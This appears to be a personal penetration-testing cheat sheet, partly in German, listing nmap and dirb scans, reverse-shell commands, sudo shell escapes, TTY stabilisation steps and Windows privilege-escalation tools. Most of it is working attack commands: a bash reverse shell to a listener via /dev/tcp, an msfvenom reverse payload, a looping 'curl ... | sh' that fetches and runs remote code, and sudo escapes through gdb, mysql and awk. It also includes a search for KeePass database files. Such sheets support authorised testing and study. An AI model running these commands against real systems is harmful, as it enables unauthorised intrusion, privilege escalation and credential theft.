6.2 KiB
Table of Contents
-
information gathering 1. nmap 2. dirb
-
inital access 1. start listener: 2. reverse shell bash: 3. reverse shell file: 4. untested:
-
Windows 1. WinPEAS 2. LOLBAS 3. WADCOMS 4. PrivescCheck Script as an alternative to WinPEAS 5. RUN these while the other scripts are working 6. for finding kbdx Files
-
to install:
- magic wormhole
- tldr
- rlwrap
sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
-
for keyring
-> if there is some kind of keyring error
sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
information gathering
nmap
for quick scan of available ips
nmap -sn ip/24
to filter output for open ips
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
scan open ports:
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
dirb
dirb http://ip
-
bei windows
nmap --vuln ip-
bei windows \+ smb
nmap --script smb-vuln* ip
-
inital access
start listener:
rlwrap -cAr nc -nlvp 9002
reverse shell bash:
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
reverse shell file:
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
-> from revshells.com
untested:
Reverse Shell as a Service
-
On your machine:
nc -l 1337 or nlvp?
-
On the target machine:
curl https://reverse-shell.sh/yourip:1337 | sh
-
reconnecting:
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
privilege escalation
always run these:
sudo -l
if sudo doesn’t work: 3.2
-
check cronjobs
ls /etc/cron.* crontab -l
TTY Spawn Shell
-
if sudo still doesn’t work
use
sudo -S commandOften during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
Python spawn shell
python -c 'import pty; pty.spawn("/bin/bash")'
Fully Interactive TTY
-
All the steps to stabilize your shell
The first step:
python3 -c 'import pty;pty.spawn("/bin/bash")'Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys.
Step two is:
export TERM=xtermThis will give us access to term commands such as clear.
Finally (and most importantly) we will background the shell using
Ctrl + ZBack in our own terminal we use
stty raw -echo; fgThis does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
stty rows 38 columns 116
OS system spawn shell
echo os.system("/bin/bash")
Bash spawn shell
/bin/sh -i
Perl spawn shell
perl —e 'exec "/bin/sh";'
Ruby spawn shell
ruby: exec “/bin/sh”
Lua spawn shell
lua: os.execute(“/bin/sh”)
IRB spawn shell
exec “/bin/sh”
VI spawn shell
:!bash
VI(2) spawn shell
:set shell=/bin/bash:shell
Nmap spawn shell
!sh
-
Exiftools
Metadaten auslesen:
exiftool picture.pngBinwalk (Binary Daten exportieren):
binwalk -e picture.png
Windows
WinPEAS
https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS
LOLBAS
https://lolbas-project.github.io/#
WADCOMS
PrivescCheck Script as an alternative to WinPEAS
https://github.com/itm4n/PrivescCheck
RUN these while the other scripts are working
whoami /priv
whoami /all
schtasks /query
for finding kbdx Files
https://github.com/ivanmrsulja/keepass2john
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
quick Wins Linux: gdb -nx -ex ’!sh’ -ex quit sudo mysql -e ’! /bin/sh’ strace -o /dev/null /bin/sh sudo awk ’BEGIN {system(“/bin/sh”)}’
evilwinrm quick Wins Linux: gdb -nx -ex ’!sh’ -ex quit sudo mysql -e ’! /bin/sh’ strace -o /dev/null /bin/sh sudo awk ’BEGIN {system(“/bin/sh”)}’